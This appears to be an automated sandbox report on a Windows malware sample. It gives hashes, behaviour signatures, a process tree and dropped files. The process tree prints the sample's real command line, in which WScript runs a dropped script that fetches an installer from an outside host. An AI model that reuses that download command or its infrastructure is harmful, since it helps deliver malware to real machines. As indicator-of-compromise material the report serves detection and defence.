af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf

Analysis

max time kernel
136s
max time network
134s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
04-12-2022 14:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe
Size

184KB
MD5

13ed3e07be245191448a5e9ac3472b00
SHA1

4c38b48a34fcd53eef9fa230f308ea3e031ff434
SHA256

af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf
SHA512

b283ecd7448e17200a0d815c4eeef489e167f77cceee393305ffc53f77d4add401c2ca03c861ecf059f86259151167a0c4c803e47325b956c5a520fb6ce17051
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3p:/7BSH8zUB+nGESaaRvoB7FJNndnI

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 15 IoCs

flow	pid	Process
2	952	WScript.exe
5	952	WScript.exe
6	820	WScript.exe
9	820	WScript.exe
11	820	WScript.exe
13	820	WScript.exe
15	820	WScript.exe
16	1260	WScript.exe
18	1260	WScript.exe
19	848	WScript.exe
21	848	WScript.exe
22	1520	WScript.exe
24	1520	WScript.exe
25	1520	WScript.exe
26	1520	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1516	1388	WerFault.exe	26

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	19	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	22	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	2	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1388 wrote to memory of 952	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	27
PID 1388 wrote to memory of 952	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	27
PID 1388 wrote to memory of 952	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	27
PID 1388 wrote to memory of 952	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	27
PID 1388 wrote to memory of 820	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	30
PID 1388 wrote to memory of 820	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	30
PID 1388 wrote to memory of 820	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	30
PID 1388 wrote to memory of 820	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	30
PID 1388 wrote to memory of 1260	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	32
PID 1388 wrote to memory of 1260	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	32
PID 1388 wrote to memory of 1260	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	32
PID 1388 wrote to memory of 1260	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	32
PID 1388 wrote to memory of 848	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	33
PID 1388 wrote to memory of 848	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	33
PID 1388 wrote to memory of 848	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	33
PID 1388 wrote to memory of 848	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	33
PID 1388 wrote to memory of 1520	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	34
PID 1388 wrote to memory of 1520	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	34
PID 1388 wrote to memory of 1520	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	34
PID 1388 wrote to memory of 1520	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	34
PID 1388 wrote to memory of 1516	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	36
PID 1388 wrote to memory of 1516	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	36
PID 1388 wrote to memory of 1516	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	36
PID 1388 wrote to memory of 1516	1388	af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe	36

C:\Users\Admin\AppData\Local\Temp\af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe
"C:\Users\Admin\AppData\Local\Temp\af0170ff025593e98e9dc2bdda8cde24e46dd4c26e35ba8878120a37836ddcbf.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1388
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7A0.js" http://www.djapp.info/?domain=IPKiNkmSsy.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O-u5Gv2VyIlpZoV9mDIaX1kSjXPeXe1jmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4VuZQ244J8K0vpmkGR_f_0izx-uhliieAEpY1pjAYJo7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf7A0.exe
  2⤵
  - Blocklisted process makes network request
  PID:952
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7A0.js" http://www.djapp.info/?domain=IPKiNkmSsy.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O-u5Gv2VyIlpZoV9mDIaX1kSjXPeXe1jmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4VuZQ244J8K0vpmkGR_f_0izx-uhliieAEpY1pjAYJo7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf7A0.exe
  2⤵
  - Blocklisted process makes network request
  PID:820
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7A0.js" http://www.djapp.info/?domain=IPKiNkmSsy.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O-u5Gv2VyIlpZoV9mDIaX1kSjXPeXe1jmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4VuZQ244J8K0vpmkGR_f_0izx-uhliieAEpY1pjAYJo7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf7A0.exe
  2⤵
  - Blocklisted process makes network request
  PID:1260
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7A0.js" http://www.djapp.info/?domain=IPKiNkmSsy.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O-u5Gv2VyIlpZoV9mDIaX1kSjXPeXe1jmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4VuZQ244J8K0vpmkGR_f_0izx-uhliieAEpY1pjAYJo7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf7A0.exe
  2⤵
  - Blocklisted process makes network request
  PID:848
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7A0.js" http://www.djapp.info/?domain=IPKiNkmSsy.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O-u5Gv2VyIlpZoV9mDIaX1kSjXPeXe1jmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4VuZQ244J8K0vpmkGR_f_0izx-uhliieAEpY1pjAYJo7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf7A0.exe
  2⤵
  - Blocklisted process makes network request
  PID:1520
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1388 -s 192
  2⤵
  - Program crash
  PID:1516

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
1KB

MD5
a4feaf11ab2269212883b999a17c7231

SHA1
73c157251f256fb9764366c49afd47fb55f466e1

SHA256
70740b40b5705b771ceb8a6229e49882aad320363388a0a44f38bacf502cdc81

SHA512
93a285cfadf4ea47a83f6130d72f4c3ab9da56911774601469211d403e5239c498d6855bc4362534289ae895ebf095bdfe4c24d1d327d0acfb01009756a21f47

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

Filesize
280B

MD5
986eda6a044d40b54bc41dfac0bfed2b

SHA1
d7928d9714ff509a0ba1f101be7307b01b785867

SHA256
ecaa7e6680e036e4538113e4a83faff190440faf053328406e0f2f8ad3458944

SHA512
b2d071d3e3ef9527b554d30bbadd2c5231fe60bec26aa2dbb30b9e8c32db982e756c570910755af85d1435193ad3af2f9131a59a71f345992d53a4c8948120a2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
438B

MD5
b0b63a39f2fcd2998f9d3b7acaf8a775

SHA1
1f90e18409f2c55655feb028d87d28af1741b15c

SHA256
478a32b56bf007b3bd5d84539e65cbeee5a21093c14db093b993372c72b79e62

SHA512
5b42414f5feb09a3ed6ca55921826c874dbd5ad3e0f2ee88e5741499ca11af14de11d156ae2caca42cf6bc7a97d845ad975ce288e4d684c2347069fc2a16fe69

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
340B

MD5
56250ab2740f6ce14040cce60cff4683

SHA1
481717feee93a128a462af414c6cb1cd15be5a8c

SHA256
0539a395553862728cf9e62cc349c6db2c9433701649ea1328a304d2495ad549

SHA512
f80a794fc5006dea4731a6d60fb4e7af79ddc6a9627b2311ea6b9a878b036cf477681673c868ccff17271433060bd51109f34faab40d0cf7beb289e8e68e00c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

Filesize
426B

MD5
dd083a35360bf93c4c02a255de7cb532

SHA1
f026d5a7fbf350b24a6269d2fd50edfbd4fe08f8

SHA256
154d899c0e3423c4f44bf019dce1f1c398caeb03eb936f3b664c41920ecffea7

SHA512
bbdbb3fc3d52a35f803f5c4db8f5798d88240bbb461cc707b6021b8448b4c3549ab3ace1401d5b8447d5fb6b39045b2d05efb0e26d9935f421d146f013a89075

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XB6YKGN8\domain_profile[1].htm

Filesize
43KB

MD5
5b9294fe2ac9b49bae460f704be806d4

SHA1
ba1a76f6e6f4f495f3f3180c89b08a4d36f22d5d

SHA256
ae5201fd06b746dde60119115268d69d1246e67c3924417922f908fdb6a7bb60

SHA512
7026537fdc68037002cd9cab6fa0b2a30ea57bf4509a605d4843c5e569998345537fad30bbfcefd4d93332127e322a3611fde3c506038b8d114eae84b311f618

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf7A0.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\CNMZYS6V.txt

Filesize
98B

MD5
7b11464da0590a54eb286e7dba864bcf

SHA1
1870c20d1fac373b774be7e6b32a704966b7ff2b

SHA256
d2a5d4695418aaf470576012f27b85eab596432ef471c089741be4376f34cf06

SHA512
4cdd6711ee0316b5a1872556165cbbd3e2eb6b2fc062445dd00db82abcacba69f055dff479a8458ec38b1902020cedc06c60eedde78b566d1e2935d3931f4e7f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\QN7I07Q2.txt

Filesize
177B

MD5
419e5bfe2630c39f78c2126b7a362468

SHA1
3e8dc89f4cdcf14f99d53dfd9261c2d6b16beb0f

SHA256
69bf1a6e29c59e4a9d7d641b8879347374f138f10979a7e7efa93c3deafed277

SHA512
aa56cc6e0c814bdfb706702e70f49675215339e2b129481a60ade2f881a4cada3e8f5f3ef01145eb2cc595bd6288c0b1dece3461332e879ab1db0fb626712e50

Download Submit
memory/1388-54-0x0000000075E11000-0x0000000075E13000-memory.dmp

Filesize
8KB

Download